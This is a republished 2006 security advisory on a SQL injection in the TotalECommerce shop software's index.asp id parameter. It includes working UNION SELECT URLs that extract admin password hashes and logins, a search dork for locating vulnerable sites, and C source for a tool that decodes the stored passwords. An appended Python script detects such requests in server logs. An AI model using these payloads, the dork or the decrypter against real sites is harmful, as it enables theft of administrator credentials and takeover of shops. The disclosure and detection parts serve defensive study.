TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.

2006.03.05
Credit: nukedx
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior version must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id parameter in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha, senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha, senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login, login,login,login,login,login, login,login,login,login,login,login,login,login,login,login,login,login, login,login,login,login,login,login,login, login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact with vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter: http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18
---
Decrypter source in C
---
/*********************************************
* TotalECommerce PWD Decrypter               *
* Coded by |SaMaN| for nukedx                *
* http://www.k9world.org                     *
* IRC.K9World.Org                            *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
    char buf[255];
    char buf2[255];
    char buf3[255];
    char *texto;
    char *vcrypt;
    int i, x = 0, z, t = 0;
    char saman;

    texto = buf;
    vcrypt = buf2;
    buf2[0] = '\0'; /* empty result string so strncat has a terminator to append to */
    printf("%s", "|=------------------------------------=|\n");
    printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
    printf("%s", "|=------------------------------------=|\n\n");
    printf("%s", "Enter crypted password: ");
    if (scanf("%200s", buf) != 1) /* no input read */
        return 1;
    if (!texto) vcrypt = "";
    for (i = 0; i < strlen(texto); i++)
    {
        if ((vcrypt == "") || (i > strlen(texto)))
            x = 1;
        else
            x = x + 1;
        /* the stored value is each character subtracted from 255 */
        t = buf[i];
        z = 255 - t;
        saman = toascii(z);
        snprintf(buf3, 250, "%c", saman);
        strncat(buf2, buf3, 250);
    }
    printf("Result: %s\n", buf2);
    return 0;
}
---End of code---
Greets to: |SaMaN|
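A log check for the request pattern in this advisory, as an added example that is not part of the original advisory or the vendor's code: it flags index.asp requests whose id parameter is not a plain integer and reports which SQL words the decoded value contains. The log field order, the /loja directory and the sample lines (with a shortened column list) are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample lines; assumed field order (IIS W3C style):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2006-03-05 10:00:01 192.0.2.10 GET /loja/index.asp secao=25&id=14 200
2006-03-05 10:00:07 192.0.2.44 GET /loja/index.asp secao=25&id=-1+UNION+select+senha,senha+from+administradores 200
2006-03-05 10:00:09 192.0.2.44 GET /loja/index.asp secao=25&id=-1%20UNION%20select%20login,login%20from%20administradores 200
2006-03-05 10:01:30 192.0.2.10 GET /loja/default.asp id=abc 200
"""

NUMERIC_ID = re.compile(r"[0-9]{1,10}")  # what a legitimate id looks like
SQL_WORDS = re.compile(r"\b(union|select|from|administradores)\b", re.I)


def suspicious_requests(log_text):
    """Return (client_ip, decoded_id, sql_words) for each index.asp
    request whose id parameter is not a plain non-negative integer."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # W3C header line or unexpected layout
        client_ip, stem, query = fields[2], fields[4], fields[5]
        if not stem.lower().endswith("/index.asp"):
            continue
        # parse_qsl decodes '+' and %XX, so both encodings compare equal
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() != "id":  # ASP parameter names are case-insensitive
                continue
            if NUMERIC_ID.fullmatch(value):
                continue
            words = sorted({w.lower() for w in SQL_WORDS.findall(value)})
            findings.append((client_ip, value, words))
    return findings


if __name__ == "__main__":
    for ip, value, words in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} id={value!r} sql_words={words}")
```

The same digits-only check belongs in index.asp itself before id reaches the query; matching logs only shows attempts after the fact.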



Copyright 2024, cxsecurity.com

 
